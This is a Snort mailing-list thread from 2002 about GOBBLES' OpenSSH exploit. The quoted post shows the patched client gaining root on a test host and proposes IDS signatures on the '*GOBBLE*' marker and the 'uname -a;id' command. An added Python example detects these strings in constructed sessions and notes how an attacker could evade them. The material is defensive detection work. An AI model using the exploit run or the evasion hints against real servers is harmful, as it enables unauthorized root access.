Snort mailing list archives

RE: GOBBLES' OpenSSH exploit.


From: Kevin Brown <Kevin.M.Brown () asu edu>
Date: Mon, 01 Jul 2002 14:50:44 -0700

 Is this one of the vulnerabilities that is closed by upgrading to 3.4 or
getting patches from the vendor (e.g. Red Hat)?

-----Original Message-----
From: Andreas Östling
To: snort-users () lists sourceforge net
Cc: snort-sigs () lists sourceforge net
Sent: 7/1/02 2:20 PM
Subject: [Snort-users] GOBBLES' OpenSSH exploit.


Hello,

I guess most people have seen the OpenSSH exploit that GOBBLES
just published ("sshutuptheo"). It obviously works very well (no, I
didn't care to check it for backdoors and I'm doing this on offline
machines :) )

[foo@192.168.1.3 openssh-3.4p1]$ nc 192.168.1.1 22
SSH-1.99-OpenSSH_3.2

(./ssh is modified with GOBBLES' patch)

[foo@192.168.1.3 openssh-3.4p1]$ ./ssh -l root 192.168.1.1
[*] remote host supports ssh2
[*] server_user: root:skey
[*] keyboard-interactive method available
[*] chunk_size: 4096 tcode_rep: 0 scode_rep 60
[*] mode: exploitation
*GOBBLE*
OpenBSD openbsd 3.1 GENERIC#59 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)


It seems impossible (or at least hard?) to catch the actual exploit
using only content matching. However, this particular exploit (at least
in its default mode), when successful, opens up a cleartext channel. The
string "*GOBBLE*" will be echoed back to the attacker who then sends the
"uname -a;id" string.

<Snipped>
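
The content-matching idea in the quoted post, written out as an added example that is not code from the thread or from Snort: walk the segments of a reassembled port-22 session and alert when the server side sends "*GOBBLE*" in the clear, and again when the client then sends "uname -a;id". The two strings and the quoted exploit output come from the post; the sample sessions, the port numbers and the binary stand-ins for key exchange and encrypted data are constructed for the example.

```python
# Added example, not code from the thread: the content-matching detection
# idea from the quoted post, run over constructed SSH sessions.  The
# "*GOBBLE*" marker and the "uname -a;id" command are taken from the post;
# the sample segments below are constructed, not captured traffic.
from typing import Iterable, List, Tuple

SSH_PORT = 22
GOBBLE_MARKER = b"*GOBBLE*"       # echoed server -> client on success
ATTACKER_CMD = b"uname -a;id"     # sent client -> server afterwards

# One TCP segment of a reassembled session: (direction, sport, dport, payload).
# direction is "s2c" (server to client) or "c2s" (client to server).
Segment = Tuple[str, int, int, bytes]


def inspect_session(segments: Iterable[Segment]) -> List[str]:
    """Return alert messages for one ordered TCP session.

    Encodes two content matches a pair of Snort rules would express:
      1. server -> client from port 22 carries "*GOBBLE*": the exploit's
         default mode has opened a cleartext shell channel.
      2. after (1), client -> server to port 22 carries "uname -a;id".
    Legitimate SSH traffic after the banner exchange is encrypted, so
    neither string should appear in it in the clear.
    """
    alerts: List[str] = []
    shell_open = False
    for direction, sport, dport, payload in segments:
        if direction == "s2c" and sport == SSH_PORT:
            if GOBBLE_MARKER in payload:
                shell_open = True
                alerts.append("GOBBLES sshutuptheo success marker from server")
        elif direction == "c2s" and dport == SSH_PORT:
            if shell_open and ATTACKER_CMD in payload:
                alerts.append("attacker command on cleartext ssh channel")
    return alerts


# Constructed benign session: banner exchange, then opaque binary packets
# standing in for key exchange and encrypted data.
BENIGN_SESSION: List[Segment] = [
    ("s2c", 22, 40001, b"SSH-1.99-OpenSSH_3.2\r\n"),
    ("c2s", 40001, 22, b"SSH-2.0-OpenSSH_3.4p1\r\n"),
    ("s2c", 22, 40001, b"\x00\x00\x03\x14\x08\x14" + bytes(16)
                       + b"\x00\x00\x00\x1adiffie-hellman-group1-sha1"),
    ("c2s", 40001, 22, b"\x00\x00\x00\x3c\x08\x1e" + b"\x9a\x11\x7f\x03" * 14),
    ("s2c", 22, 40001, b"\x5b\xaf\x01\x9c\x2a" * 12),
]

# Constructed exploited session modelled on the output quoted in the post:
# after the marker, the attacker's command and its result travel in the clear.
EXPLOITED_SESSION: List[Segment] = [
    ("s2c", 22, 40002, b"SSH-1.99-OpenSSH_3.2\r\n"),
    ("c2s", 40002, 22, b"SSH-2.0-OpenSSH_3.4p1\r\n"),
    ("c2s", 40002, 22, b"\x00\x00\x10\x0c\x08\x3c" + b"\x90" * 4096),
    ("s2c", 22, 40002, b"*GOBBLE*\n"),
    ("c2s", 40002, 22, b"uname -a;id\n"),
    ("s2c", 22, 40002, b"OpenBSD openbsd 3.1 GENERIC#59 i386\nuid=0(root) gid=0(wheel)\n"),
]

if __name__ == "__main__":
    print("benign:", inspect_session(BENIGN_SESSION))
    print("exploited:", inspect_session(EXPLOITED_SESSION))
```

In Snort terms the first check is a from-server rule on port 22 with `content:"*GOBBLE*"`, the second a from-client rule that only matters once the first has fired. Both strings are properties of this exploit's default mode: anyone who edits the marker or sends a different first command evades them, and the post says as much about catching the exploit itself. The signal that survives such edits is cleartext where ciphertext is expected, which is why the example keys on the direction and port rather than on the strings alone.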

Current thread: